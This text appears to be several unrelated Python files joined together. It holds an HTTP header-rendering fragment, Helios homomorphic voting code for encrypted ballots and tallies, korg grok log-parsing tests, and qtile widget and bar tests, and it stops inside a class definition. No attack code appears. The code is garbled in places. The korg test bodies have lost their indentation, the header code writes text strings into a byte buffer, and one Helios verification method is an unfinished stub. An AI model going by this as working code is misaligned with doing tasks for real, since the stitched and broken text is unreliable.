    def add_param(self, name, value):
        self.params.append((name, value))
    def __str__(self):
        with closing(BytesIO()) as h:
            h.write(b"%s: %s" % (
                self.name, _escape(self.value).encode("us-ascii")))
            # Each parameter is rendered as ``; name="value"``.
            for (name, val) in self.params:
                h.write("; ")
                h.write(_escape(name).encode("us-ascii"))
                h.write("=")
                h.write(b'"%s"' % (_escape(val).encode('utf-8'),))
            h.seek(0)
            return h.read()
def _sorted_by_type(fields):
    """Sort params so that strings come before files.

    That makes a request more readable, as generally files are bigger.
    It also gives a deterministic field order, which is easier to test.
    """
    def sort_key(pair):
        name, value = pair
        group = 0 if isinstance(value, (str, unicode)) else 1
        return (group, name)
    return sorted(fields, key=sort_key)
| |
"""
homomorphic workflow and algorithms for Helios
Ben Adida
2008-08-30
reworked 2011-01-09
"""
from helios.crypto import algs, utils
import logging
import uuid
import datetime
from helios import models
from . import WorkflowObject
class EncryptedAnswer(WorkflowObject):
    """
    An encrypted answer to a single election question: one ElGamal
    ciphertext per possible answer, a disjunctive zero-knowledge proof
    per ciphertext, and (unless max is None) an overall proof that the
    number of selected answers is within bounds.
    """
    def __init__(self, choices=None, individual_proofs=None, overall_proof=None, randomness=None, answer=None):
        # choices: one ciphertext per possible answer
        # individual_proofs: one disjunctive ZK proof per choice
        # overall_proof: disjunctive ZK proof on the homomorphic sum
        # randomness: per-choice encryption randomness (client-side only)
        # answer: the plaintext answer indexes (client-side only)
        self.choices = choices
        self.individual_proofs = individual_proofs
        self.overall_proof = overall_proof
        self.randomness = randomness
        self.answer = answer
    @classmethod
    def generate_plaintexts(cls, pk, min=0, max=1):
        """
        Return the EGPlaintexts for g^min .. g^max (mod p) -- the possible
        values a (sum of) choice ciphertext may encrypt.
        """
        plaintexts = []
        running_product = 1
        # run the product up to the min
        for i in range(max+1):
            # if we're in the range, add it to the array
            if i >= min:
                plaintexts.append(algs.EGPlaintext(running_product, pk))
            # next value in running product
            running_product = (running_product * pk.g) % pk.p
        return plaintexts
    def verify_plaintexts_and_randomness(self, pk):
        """
        this applies only if the explicit answers and randomness factors are given
        we do not verify the proofs here, that is the verify() method

        NOTE(review): unfinished -- always returns False (see WORK HERE).
        """
        if not hasattr(self, 'answer'):
            return False
        for choice_num in range(len(self.choices)):
            choice = self.choices[choice_num]
            choice.pk = pk
            # redo the encryption
            # WORK HERE (paste from below encryption)
            return False
    def verify(self, pk, min=0, max=1):
        """
        Verify every individual 0-or-1 proof and, when max is not None,
        the overall proof that between min and max answers were selected.
        """
        possible_plaintexts = self.generate_plaintexts(pk)
        homomorphic_sum = 0
        for choice_num in range(len(self.choices)):
            choice = self.choices[choice_num]
            choice.pk = pk
            individual_proof = self.individual_proofs[choice_num]
            # verify the proof on the encryption of that choice
            if not choice.verify_disjunctive_encryption_proof(possible_plaintexts, individual_proof, algs.EG_disjunctive_challenge_generator):
                return False
            # compute homomorphic sum if needed
            if max != None:
                homomorphic_sum = choice * homomorphic_sum
        if max != None:
            # determine possible plaintexts for the sum
            sum_possible_plaintexts = self.generate_plaintexts(pk, min=min, max=max)
            # verify the sum
            return homomorphic_sum.verify_disjunctive_encryption_proof(sum_possible_plaintexts, self.overall_proof, algs.EG_disjunctive_challenge_generator)
        else:
            # approval voting, no need for overall proof verification
            return True
    @classmethod
    def fromElectionAndAnswer(cls, election, question_num, answer_indexes):
        """
        Given an election, a question number, and a list of answers to that question
        in the form of an array of 0-based indexes into the answer array,
        produce an EncryptedAnswer that works.
        """
        question = election.questions[question_num]
        answers = question['answers']
        pk = election.public_key
        # initialize choices, individual proofs, randomness and overall proof
        choices = [None for a in range(len(answers))]
        individual_proofs = [None for a in range(len(answers))]
        overall_proof = None
        randomness = [None for a in range(len(answers))]
        # possible plaintexts [0, 1]
        plaintexts = cls.generate_plaintexts(pk)
        # keep track of number of options selected.
        num_selected_answers = 0;
        # homomorphic sum of all
        homomorphic_sum = 0
        randomness_sum = 0
        # min and max for number of answers, useful later
        min_answers = 0
        if question.has_key('min'):
            min_answers = question['min']
        max_answers = question['max']
        # go through each possible answer and encrypt either a g^0 or a g^1.
        for answer_num in range(len(answers)):
            plaintext_index = 0
            # assuming a list of answers
            if answer_num in answer_indexes:
                plaintext_index = 1
                num_selected_answers += 1
            # randomness and encryption
            randomness[answer_num] = algs.Utils.random_mpz_lt(pk.q)
            choices[answer_num] = pk.encrypt_with_r(plaintexts[plaintext_index], randomness[answer_num])
            # generate proof
            individual_proofs[answer_num] = choices[answer_num].generate_disjunctive_encryption_proof(plaintexts, plaintext_index,
                                                randomness[answer_num], algs.EG_disjunctive_challenge_generator)
            # sum things up homomorphically if needed
            if max_answers != None:
                homomorphic_sum = choices[answer_num] * homomorphic_sum
                randomness_sum = (randomness_sum + randomness[answer_num]) % pk.q
        # prove that the sum is 0 or 1 (can be "blank vote" for this answer)
        # num_selected_answers is 0 or 1, which is the index into the plaintext that is actually encoded
        if num_selected_answers < min_answers:
            raise Exception("Need to select at least %s answer(s)" % min_answers)
        if max_answers != None:
            sum_plaintexts = cls.generate_plaintexts(pk, min=min_answers, max=max_answers)
            # need to subtract the min from the offset
            overall_proof = homomorphic_sum.generate_disjunctive_encryption_proof(sum_plaintexts, num_selected_answers - min_answers, randomness_sum, algs.EG_disjunctive_challenge_generator);
        else:
            # approval voting
            overall_proof = None
        return cls(choices, individual_proofs, overall_proof, randomness, answer_indexes)
    # WORK HERE
class EncryptedVote(WorkflowObject):
    """
    An encrypted ballot: one L{EncryptedAnswer} per election question,
    plus the hash and uuid of the election it was cast in.
    """
    def __init__(self):
        self.encrypted_answers = None
    @property
    def datatype(self):
        # FIXME
        return "legacy/EncryptedVote"
    def _answers_get(self):
        return self.encrypted_answers
    def _answers_set(self, value):
        self.encrypted_answers = value
    # Legacy alias: callers may use .answers instead of .encrypted_answers.
    answers = property(_answers_get, _answers_set)
    def verify(self, election):
        """
        Check this ballot against ``election``: answer count, election
        hash, election uuid, and the proofs of every encrypted answer.
        Returns True only if everything matches.
        """
        # right number of answers
        if len(self.encrypted_answers) != len(election.questions):
            return False
        # check hash
        if self.election_hash != election.hash:
            # print "%s / %s " % (self.election_hash, election.hash)
            return False
        # check ID
        if self.election_uuid != election.uuid:
            return False
        # check proofs on all of answers
        for question_num in range(len(election.questions)):
            ea = self.encrypted_answers[question_num]
            question = election.questions[question_num]
            # 'min' is optional in the question definition; default to 0.
            # (Was question.has_key('min'): dict.has_key is deprecated and
            # removed in Python 3; the `in` operator is equivalent.)
            min_answers = question['min'] if 'min' in question else 0
            if not ea.verify(election.public_key, min=min_answers, max=question['max']):
                return False
        return True
    @classmethod
    def fromElectionAndAnswers(cls, election, answers):
        """
        Build an encrypted ballot from per-question lists of answer
        indexes.  (Removed an unused local ``pk``.)
        """
        # each answer is an index into the answer array
        encrypted_answers = [EncryptedAnswer.fromElectionAndAnswer(election, answer_num, answers[answer_num]) for answer_num in range(len(answers))]
        return_val = cls()
        return_val.encrypted_answers = encrypted_answers
        return_val.election_hash = election.hash
        return_val.election_uuid = election.uuid
        return return_val
class DLogTable(object):
    """
    Incrementally-built discrete-log lookup table for a fixed base and
    modulus: maps base^k mod modulus -> k for k = 0 .. counter.
    """
    def __init__(self, base, modulus):
        self.base = base
        self.modulus = modulus
        # base^0 == 1, so 1 always maps to exponent 0.
        self.dlogs = {1: 0}
        self.last_dlog_result = 1
        self.counter = 0
    def increment(self):
        """Extend the table by one exponent."""
        next_value = (self.last_dlog_result * self.base) % self.modulus
        self.counter += 1
        self.dlogs[next_value] = self.counter
        self.last_dlog_result = next_value
    def precompute(self, up_to):
        """Extend the table until exponent ``up_to`` is covered (no-op if
        already there)."""
        for _ in range(up_to - self.counter):
            self.increment()
    def lookup(self, value):
        """Return the exponent for ``value``, or None if not in the table."""
        return self.dlogs.get(value, None)
class Tally(WorkflowObject):
    """
    A running homomorphic tally: one ciphertext per (question, answer)
    pair, each the homomorphic product of all cast choices.
    """
    @property
    def datatype(self):
        return "legacy/Tally"
    def __init__(self, *args, **kwargs):
        super(Tally, self).__init__()
        election = kwargs.get('election',None)
        self.tally = None
        self.num_tallied = 0
        if election:
            self.init_election(election)
            # Start every cell at 0.  NOTE(review): this relies on the
            # ciphertext multiplication treating 0 as an identity operand
            # (see add_vote) -- confirm against algs.EGCiphertext.
            self.tally = [[0 for a in q['answers']] for q in self.questions]
        else:
            self.questions = None
            self.public_key = None
            self.tally = None
    def init_election(self, election):
        """
        given the election, initialize some params
        """
        self.election = election
        self.questions = election.questions
        self.public_key = election.public_key
    def add_vote_batch(self, encrypted_votes, verify_p=True):
        """
        Add a batch of votes. Eventually, this will be optimized to do an aggregate proof verification
        rather than a whole proof verif for each vote.
        """
        for vote in encrypted_votes:
            self.add_vote(vote, verify_p)
    def add_vote(self, encrypted_vote, verify_p=True):
        """
        Homomorphically fold one encrypted vote into the tally, optionally
        verifying its proofs first (raises on a bad vote).
        """
        # do we verify?
        if verify_p:
            if not encrypted_vote.verify(self.election):
                raise Exception('Bad Vote')
        # for each question
        for question_num in range(len(self.questions)):
            question = self.questions[question_num]
            answers = question['answers']
            # for each possible answer to each question
            for answer_num in range(len(answers)):
                # do the homomorphic addition into the tally
                enc_vote_choice = encrypted_vote.encrypted_answers[question_num].choices[answer_num]
                enc_vote_choice.pk = self.public_key
                self.tally[question_num][answer_num] = encrypted_vote.encrypted_answers[question_num].choices[answer_num] * self.tally[question_num][answer_num]
        self.num_tallied += 1
    def decryption_factors_and_proofs(self, sk):
        """
        returns an array of decryption factors and a corresponding array of decryption proofs.
        makes the decryption factors into strings, for general Helios / JS compatibility.
        """
        # for all choices of all questions (double list comprehension)
        decryption_factors = []
        decryption_proof = []
        for question_num, question in enumerate(self.questions):
            answers = question['answers']
            question_factors = []
            question_proof = []
            for answer_num, answer in enumerate(answers):
                # do decryption and proof of it
                dec_factor, proof = sk.decryption_factor_and_proof(self.tally[question_num][answer_num])
                # look up appropriate discrete log
                # this is the string conversion
                question_factors.append(dec_factor)
                question_proof.append(proof)
            decryption_factors.append(question_factors)
            decryption_proof.append(question_proof)
        return decryption_factors, decryption_proof
    def decrypt_and_prove(self, sk, discrete_logs=None):
        """
        returns an array of tallies and a corresponding array of decryption proofs.
        """
        # who's keeping track of discrete logs?
        if not discrete_logs:
            # NOTE(review): self.discrete_logs is never assigned anywhere in
            # this class, so calling this without the discrete_logs argument
            # would raise AttributeError -- confirm intended usage.
            discrete_logs = self.discrete_logs
        # for all choices of all questions (double list comprehension)
        decrypted_tally = []
        decryption_proof = []
        for question_num in range(len(self.questions)):
            question = self.questions[question_num]
            answers = question['answers']
            question_tally = []
            question_proof = []
            for answer_num in range(len(answers)):
                # do decryption and proof of it
                plaintext, proof = sk.prove_decryption(self.tally[question_num][answer_num])
                # look up appropriate discrete log
                question_tally.append(discrete_logs[plaintext])
                question_proof.append(proof)
            decrypted_tally.append(question_tally)
            decryption_proof.append(question_proof)
        return decrypted_tally, decryption_proof
    def verify_decryption_proofs(self, decryption_factors, decryption_proofs, public_key, challenge_generator):
        """
        decryption_factors is a list of lists of dec factors
        decryption_proofs are the corresponding proofs
        public_key is, of course, the public key of the trustee
        """
        # go through each one
        for q_num, q in enumerate(self.tally):
            for a_num, answer_tally in enumerate(q):
                # parse the proof
                #proof = algs.EGZKProof.fromJSONDict(decryption_proofs[q_num][a_num])
                proof = decryption_proofs[q_num][a_num]
                # check that g, alpha, y, dec_factor is a DH tuple
                if not proof.verify(public_key.g, answer_tally.alpha, public_key.y, int(decryption_factors[q_num][a_num]), public_key.p, public_key.q, challenge_generator):
                    return False
        return True
    def decrypt_from_factors(self, decryption_factors, public_key):
        """
        decrypt a tally given decryption factors
        The decryption factors are a list of decryption factor sets, for each trustee.
        Each decryption factor set is a list of lists of decryption factors (questions/answers).
        """
        # pre-compute a dlog table
        dlog_table = DLogTable(base = public_key.g, modulus = public_key.p)
        dlog_table.precompute(self.num_tallied)
        result = []
        # go through each one
        for q_num, q in enumerate(self.tally):
            q_result = []
            for a_num, a in enumerate(q):
                # coalesce the decryption factors into one list
                dec_factor_list = [df[q_num][a_num] for df in decryption_factors]
                raw_value = self.tally[q_num][a_num].decrypt(dec_factor_list, public_key)
                q_result.append(dlog_table.lookup(raw_value))
            result.append(q_result)
        return result
    def _process_value_in(self, field_name, field_value):
        # deserialization hook: tally ciphertexts come in as JSON dicts
        if field_name == 'tally':
            return [[algs.EGCiphertext.fromJSONDict(a) for a in q] for q in field_value]
    def _process_value_out(self, field_name, field_value):
        # serialization hook: tally ciphertexts go out as JSON dicts
        if field_name == 'tally':
            return [[a.toJSONDict() for a in q] for q in field_value]
| |
from nose.tools import istest as test
from nose.tools import nottest
from pyvows import Vows, expect
from korg.korg import LineGrokker
from korg.pattern import PatternRepo
# test samples taken from logstash/spec/filters/grok.rb v1.1.13
@Vows.create_assertions
def has_element(topic, expected):
    # Assertion helper: ``topic`` contains ``expected``
    # (used as expect(...).has_element(...)).
    return expected in topic
@Vows.create_assertions
def not_has_element(topic, expected):
    # Assertion helper: ``topic`` does not contain ``expected``.
    return expected not in topic
# describe korg
@test
def it_groks_simple_syslog_line():
pr = PatternRepo(['patterns/'])
g = LineGrokker('%{SYSLOGLINE}', pr)
subject = g.grok('Mar 16 00:01:25 evita postfix/smtpd[1713]: connect from camomile.cloud9.net[168.100.1.3]')
print 'subject: %s' % subject
expect(subject["logsource"]).to_equal("evita")
expect(subject["timestamp"]).to_equal("Mar 16 00:01:25")
expect(subject["message"]).to_equal("connect from camomile.cloud9.net[168.100.1.3]")
expect(subject["program"]).to_equal("postfix/smtpd")
expect(subject["pid"]).to_equal("1713")
# reject { subject["@tags"] }.include?("_grokparsefailure")
@test
def it_groks_ietf_5424_syslog_line():
pr = PatternRepo(['patterns/'])
g = LineGrokker('%{SYSLOG5424LINE}', pr)
subject = g.grok('<191>1 2009-06-30T18:30:00+02:00 paxton.local grokdebug 4123 - [id1 foo=\"bar\"][id2 baz=\"something\"] Hello, syslog.')
print 'subject: %s' % subject
expect(subject["syslog5424_pri"]).to_equal("<191>")
expect(subject["syslog5424_ver"]).to_equal("1")
expect(subject["syslog5424_ts"]).to_equal("2009-06-30T18:30:00+02:00")
expect(subject["syslog5424_host"]).to_equal("paxton.local")
expect(subject["syslog5424_app"]).to_equal("grokdebug")
expect(subject["syslog5424_proc"]).to_equal("4123")
expect(subject["syslog5424_msgid"]).to_equal(None)
expect(subject["syslog5424_sd"]).to_equal("[id1 foo=\"bar\"][id2 baz=\"something\"]")
expect(subject["syslog5424_msg"]).to_equal("Hello, syslog.")
"""
describe "parsing an event with multiple messages (array of strings)" do
config <<-CONFIG
filter {
grok {
pattern => "(?:hello|world) %{NUMBER}"
named_captures_only => false
}
}
CONFIG
sample({ "@message" => [ "hello 12345", "world 23456" ] }) do
insist { subject["NUMBER"] } == [ "12345", "23456" ]
end
end
describe "coercing matched values" do
config <<-CONFIG
filter {
grok {
pattern => "%{NUMBER:foo:int} %{NUMBER:bar:float}"
singles => true
}
}
CONFIG
sample "400 454.33" do
insist { subject["foo"] } == 400
insist { subject["foo"] }.is_a?(Fixnum)
insist { subject["bar"] } == 454.33
insist { subject["bar"] }.is_a?(Float)
end
end
describe "in-line pattern definitions" do
config <<-CONFIG
filter {
grok {
pattern => "%{FIZZLE=\\d+}"
named_captures_only => false
singles => true
}
}
CONFIG
sample "hello 1234" do
insist { subject["FIZZLE"] } == "1234"
end
end
describe "processing fields other than @message" do
config <<-CONFIG
filter {
grok {
pattern => "%{WORD:word}"
match => [ "examplefield", "%{NUMBER:num}" ]
break_on_match => false
singles => true
}
}
CONFIG
sample({ "@message" => "hello world", "@fields" => { "examplefield" => "12345" } }) do
insist { subject["examplefield"] } == "12345"
insist { subject["word"] } == "hello"
end
end
describe "adding fields on match" do
config <<-CONFIG
filter {
grok {
pattern => "matchme %{NUMBER:fancy}"
singles => true
add_field => [ "new_field", "%{fancy}" ]
}
}
CONFIG
sample "matchme 1234" do
reject { subject["@tags"] }.include?("_grokparsefailure")
insist { subject["new_field"] } == ["1234"]
end
sample "this will not be matched" do
insist { subject["@tags"] }.include?("_grokparsefailure")
reject { subject }.include?("new_field")
end
end
"""
# empty fields
@nottest
def it_drops_empty_fields_by_default():
    # not implemented
    grokker = LineGrokker('1=%{WORD:foo1} *(2=%{WORD:foo2})?', PatternRepo(['patterns/']))
    subject = grokker.grok('1=test')
    expect(subject).has_element("foo1")
    # Since 'foo2' was not captured, it must not be present in the event.
    expect(subject).not_has_element("foo2")
@test
def it_keep_empty_fields():
    # An optional, unmatched capture stays in the event with value None
    # (empty fields are kept, unlike logstash's default behaviour).
    grokker = LineGrokker('1=%{WORD:foo1} *(2=%{WORD:foo2})?', PatternRepo(['patterns/']))
    subject = grokker.grok('1=test')
    expect(subject).has_element("foo1")
    expect(subject).has_element("foo2")
    expect(subject["foo2"]).to_equal(None)
"""
describe "when named_captures_only == false" do
config <<-CONFIG
filter {
grok {
pattern => "Hello %{WORD}. %{WORD:foo}"
named_captures_only => false
singles => true
}
}
CONFIG
sample "Hello World, yo!" do
insist { subject }.include?("WORD")
insist { subject["WORD"] } == "World"
insist { subject }.include?("foo")
insist { subject["foo"] } == "yo"
end
end
"""
@test
def it_uses_named_captures():
pr = PatternRepo(['patterns/'])
g = LineGrokker('(?<foo>\w+)', pr)
subject = g.grok('hello world')
print 'subject: %s' % subject
expect(subject["foo"]).to_equal("hello")
@test
def it_groks_patterns():
pr = PatternRepo(['patterns/'])
g = LineGrokker('(?<timestamp>%{DATE_EU} %{TIME})', pr)
subject = g.grok('fancy 2001-02-03 04:05:06')
print 'subject: %s' % subject
expect(subject["timestamp"]).to_equal("2001-02-03 04:05:06")
"""
describe "grok on integer types" do
config <<-'CONFIG'
filter {
grok {
match => [ "status", "^403$" ]
add_tag => "four_oh_three"
}
}
CONFIG
sample({ "@fields" => { "status" => 403 } }) do
reject { subject.tags }.include?("_grokparsefailure")
insist { subject.tags }.include?("four_oh_three")
end
end
describe "grok on float types" do
config <<-'CONFIG'
filter {
grok {
match => [ "version", "^1.0$" ]
add_tag => "one_point_oh"
}
}
CONFIG
sample({ "@fields" => { "version" => 1.0 } }) do
reject { subject.tags }.include?("_grokparsefailure")
insist { subject.tags }.include?("one_point_oh")
end
end
describe "tagging on failure" do
config <<-CONFIG
filter {
grok {
pattern => "matchme %{NUMBER:fancy}"
tag_on_failure => false
}
}
CONFIG
sample "matchme 1234" do
reject { subject["@tags"] }.include?("_grokparsefailure")
end
sample "this will not be matched" do
reject { subject["@tags"] }.include?("_grokparsefailure")
end
end
end
"""
@test
def it_captures_named_fields_even_if_the_whole_text_matches():
pr = PatternRepo(['patterns/'])
g = LineGrokker('%{DATE_EU:stimestamp}', pr)
subject = g.grok('2011/01/01')
print 'subject: %s' % subject
expect(subject["stimestamp"]).to_equal("2011/01/01")
@nottest
def it_allows_dashes_in_capture_names():
# not implemented
pr = PatternRepo(['patterns/'])
g = LineGrokker('%{WORD:foo-bar}', pr)
subject = g.grok('hello world')
print 'subject: %s' % subject
expect(subject["foo-bar"]).to_equal("hello")
| |
# Copyright (c) 2011 Florian Mounier
# Copyright (c) 2012-2013 Craig Barnes
# Copyright (c) 2012 roger
# Copyright (c) 2012, 2014-2015 Tycho Andersen
# Copyright (c) 2014 Sean Vig
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os
import tempfile
import pytest
import libqtile.bar
import libqtile.config
import libqtile.confreader
import libqtile.layout
import libqtile.widget
class GBConfig:
    """Qtile config used by the ``gb_config``-parametrized tests below.

    Five groups with names of varying length, a top bar full of graph
    widgets, and a bottom bar with GroupBox/Prompt/Clock widgets for the
    widget tests to drive.
    """
    auto_fullscreen = True
    keys = []
    mouse = []
    groups = [
        libqtile.config.Group("a"),
        libqtile.config.Group("bb"),
        libqtile.config.Group("ccc"),
        libqtile.config.Group("dddd"),
        libqtile.config.Group("Pppy")
    ]
    layouts = [libqtile.layout.stack.Stack(num_stacks=1)]
    floating_layout = libqtile.layout.floating.Floating()
    screens = [
        libqtile.config.Screen(
            top=libqtile.bar.Bar(
                [
                    libqtile.widget.CPUGraph(
                        width=libqtile.bar.STRETCH,
                        type="linefill",
                        border_width=20,
                        margin_x=1,
                        margin_y=1
                    ),
                    libqtile.widget.MemoryGraph(type="line"),
                    libqtile.widget.SwapGraph(type="box"),
                    libqtile.widget.TextBox(name="text",
                                            background="333333"),
                ],
                50,
            ),
            bottom=libqtile.bar.Bar(
                [
                    libqtile.widget.GroupBox(),
                    libqtile.widget.AGroupBox(),
                    libqtile.widget.Prompt(),
                    libqtile.widget.WindowName(),
                    libqtile.widget.Sep(),
                    libqtile.widget.Clock(),
                ],
                50
            ),
            # TODO: Add vertical bars and test widgets that support them
        )
    ]
    main = None
gb_config = pytest.mark.parametrize("qtile", [GBConfig], indirect=True)
def test_completion():
    """Exercise CommandCompleter lookup cycling and filesystem completion.

    The completer is stateful: repeated ``complete()`` calls with the
    same input cycle through the candidates, and ``reset()`` starts a
    fresh cycle — the call order below is significant.
    """
    c = libqtile.widget.prompt.CommandCompleter(None, True)
    c.reset()
    c.lookup = [
        ("a", "x/a"),
        ("aa", "x/aa"),
    ]
    # Cycles a -> aa -> back to a.
    assert c.complete("a") == "a"
    assert c.actual() == "x/a"
    assert c.complete("a") == "aa"
    assert c.complete("a") == "a"

    # Without a fixed lookup table, completion scans $PATH.
    c = libqtile.widget.prompt.CommandCompleter(None)
    r = c.complete("l")
    assert c.actual().endswith(r)

    c.reset()
    assert c.complete("/bi") == "/bin/"
    c.reset()
    assert c.complete("/bin") != "/bin/"
    c.reset()

    # Tilde-prefixed paths should complete without being expanded.
    home_dir = os.path.expanduser("~")
    with tempfile.TemporaryDirectory(prefix="qtile_test_",
                                     dir=home_dir) as absolute_tmp_path:
        tmp_dirname = absolute_tmp_path[len(home_dir + os.sep):]
        user_input = os.path.join("~", tmp_dirname)
        assert c.complete(user_input) == user_input
        c.reset()

        # A single subdirectory completes with a trailing separator.
        test_bin_dir = os.path.join(absolute_tmp_path, "qtile-test-bin")
        os.mkdir(test_bin_dir)
        assert c.complete(user_input) == os.path.join(user_input, "qtile-test-bin") + os.sep
        c.reset()

    # Nonexistent input is returned unchanged.
    s = "thisisatotallynonexistantpathforsure"
    assert c.complete(s) == s
    assert c.actual() == s
    c.reset()
@gb_config
def test_draw(qtile):
    """The bottom bar reports its first widget (the GroupBox) once a
    window exists to draw."""
    qtile.test_window("one")
    b = qtile.c.bar["bottom"].info()
    assert b["widgets"][0]["name"] == "groupbox"
@gb_config
def test_prompt(qtile):
    """Smoke-test the Prompt widget: zero width while idle, and tab
    completion keypresses must not crash it."""
    assert qtile.c.widget["prompt"].info()["width"] == 0
    qtile.c.spawncmd(":")
    qtile.c.widget["prompt"].fake_keypress("a")
    qtile.c.widget["prompt"].fake_keypress("Tab")

    qtile.c.spawncmd(":")
    qtile.c.widget["prompt"].fake_keypress("slash")
    qtile.c.widget["prompt"].fake_keypress("Tab")
@gb_config
def test_event(qtile):
    """Switching to another group must not crash the bar's event hooks."""
    qtile.c.group["bb"].toscreen()
@gb_config
def test_textbox(qtile):
    """TextBox round-trips updates and survives a group switch and a
    font-size change."""
    assert "text" in qtile.c.list_widgets()
    s = "some text"
    qtile.c.widget["text"].update(s)
    assert qtile.c.widget["text"].get() == s
    # A longer string forces the widget to grow.
    s = "Aye, much longer string than the initial one"
    qtile.c.widget["text"].update(s)
    assert qtile.c.widget["text"].get() == s
    qtile.c.group["Pppy"].toscreen()
    qtile.c.widget["text"].set_font(fontsize=12)
@gb_config
def test_textbox_errors(qtile):
    """Pathological inputs (None, control characters, Latin-1 escapes,
    a private-use codepoint) must not crash the TextBox."""
    qtile.c.widget["text"].update(None)
    qtile.c.widget["text"].update("".join(chr(i) for i in range(255)))
    qtile.c.widget["text"].update("V\xE2r\xE2na\xE7\xEE")
    qtile.c.widget["text"].update("\ua000")
@gb_config
def test_groupbox_button_press(qtile):
    """Clicking near the left edge of the GroupBox selects group "a"."""
    qtile.c.group["ccc"].toscreen()
    assert qtile.c.groups()["a"]["screen"] is None
    # Left-click (button 1) at x=10,y=10 of the bottom bar.
    qtile.c.bar["bottom"].fake_button_press(0, "bottom", 10, 10, 1)
    assert qtile.c.groups()["a"]["screen"] == 0
class GeomConf:
    """Config with an empty 10px bar on every screen edge; used by the
    geometry/resize tests and as a base config for the bar-layout tests."""
    auto_fullscreen = False
    main = None
    keys = []
    mouse = []
    groups = [
        libqtile.config.Group("a"),
        libqtile.config.Group("b"),
        libqtile.config.Group("c"),
        libqtile.config.Group("d")
    ]
    layouts = [libqtile.layout.stack.Stack(num_stacks=1)]
    floating_layout = libqtile.layout.floating.Floating()
    screens = [
        libqtile.config.Screen(
            top=libqtile.bar.Bar([], 10),
            bottom=libqtile.bar.Bar([], 10),
            left=libqtile.bar.Bar([], 10),
            right=libqtile.bar.Bar([], 10),
        )
    ]
geom_config = pytest.mark.parametrize("qtile", [GeomConf], indirect=True)
class DBarH(libqtile.bar.Bar):
    """Bar stub forced into horizontal orientation for the resize tests."""

    def __init__(self, widgets, size):
        super().__init__(widgets, size)
        self.horizontal = True
class DBarV(libqtile.bar.Bar):
    """Bar stub forced into vertical orientation for the resize tests."""

    def __init__(self, widgets, size):
        super().__init__(widgets, size)
        self.horizontal = False
class DWidget:
    """Minimal widget stand-in carrying only a length and a length type."""

    def __init__(self, length, length_type):
        self.length = length
        self.length_type = length_type
@geom_config
def test_geometry(qtile):
    """With a 10px bar on each edge of an 800x600 screen, the gaps and
    the managed window geometry must account for every bar."""
    qtile.test_xeyes()
    g = qtile.c.screens()[0]["gaps"]
    # (x, y, width, height) per edge.
    assert g["top"] == (0, 0, 800, 10)
    assert g["bottom"] == (0, 590, 800, 10)
    assert g["left"] == (0, 10, 10, 580)
    assert g["right"] == (790, 10, 10, 580)
    assert len(qtile.c.windows()) == 1
    geom = qtile.c.windows()[0]
    assert geom["x"] == 10
    assert geom["y"] == 10
    # 800/600 minus the two 10px bars per axis; the remaining 2px is
    # presumably the window border — confirm against the layout defaults.
    assert geom["width"] == 778
    assert geom["height"] == 578
    # One internal window per bar.
    internal = qtile.c.internal_windows()
    assert len(internal) == 4
    wid = qtile.c.bar["bottom"].info()["window"]
    assert qtile.c.window[wid].inspect()
@geom_config
def test_resize(qtile):
    """Bar._resize distributes leftover space across STRETCH widgets and
    assigns offsets, for both horizontal and vertical bars."""
    def wd(l):
        # Widget lengths after a resize.
        return [i.length for i in l]

    def offx(l):
        return [i.offsetx for i in l]

    def offy(l):
        return [i.offsety for i in l]

    # Same expectations along x for a horizontal bar and y for a vertical one.
    for DBar, off in ((DBarH, offx), (DBarV, offy)):  # noqa: N806
        b = DBar([], 100)

        # Two STRETCH widgets between fixed-size widgets split the slack.
        dwidget_list = [
            DWidget(10, libqtile.bar.CALCULATED),
            DWidget(None, libqtile.bar.STRETCH),
            DWidget(None, libqtile.bar.STRETCH),
            DWidget(10, libqtile.bar.CALCULATED),
        ]
        b._resize(100, dwidget_list)
        assert wd(dwidget_list) == [10, 40, 40, 10]
        assert off(dwidget_list) == [0, 10, 50, 90]

        # An odd remainder goes to the last STRETCH widget.
        b._resize(101, dwidget_list)
        assert wd(dwidget_list) == [10, 40, 41, 10]
        assert off(dwidget_list) == [0, 10, 50, 91]

        # A lone fixed widget keeps its size at offset 0.
        dwidget_list = [
            DWidget(10, libqtile.bar.CALCULATED)
        ]
        b._resize(100, dwidget_list)
        assert wd(dwidget_list) == [10]
        assert off(dwidget_list) == [0]

        # STRETCH at the end absorbs the remaining space.
        dwidget_list = [
            DWidget(10, libqtile.bar.CALCULATED),
            DWidget(None, libqtile.bar.STRETCH)
        ]
        b._resize(100, dwidget_list)
        assert wd(dwidget_list) == [10, 90]
        assert off(dwidget_list) == [0, 10]

        # STRETCH at the start pushes the fixed widget to the far edge.
        dwidget_list = [
            DWidget(None, libqtile.bar.STRETCH),
            DWidget(10, libqtile.bar.CALCULATED),
        ]
        b._resize(100, dwidget_list)
        assert wd(dwidget_list) == [90, 10]
        assert off(dwidget_list) == [0, 90]

        # STRETCH in the middle fills the gap between fixed widgets.
        dwidget_list = [
            DWidget(10, libqtile.bar.CALCULATED),
            DWidget(None, libqtile.bar.STRETCH),
            DWidget(10, libqtile.bar.CALCULATED),
        ]
        b._resize(100, dwidget_list)
        assert wd(dwidget_list) == [10, 80, 10]
        assert off(dwidget_list) == [0, 10, 90]
class ExampleWidget(libqtile.widget.base._Widget):
    """Fixed-width (10px) widget that supports only horizontal bars."""

    orientations = libqtile.widget.base.ORIENTATION_HORIZONTAL

    def __init__(self):
        super().__init__(10)

    def draw(self):
        # Nothing to render; the tests only inspect geometry.
        pass
class IncompatibleWidgetConf:
    """Config placing a horizontal-only widget in a vertical (left) bar;
    creating a manager from it must raise ConfigError."""
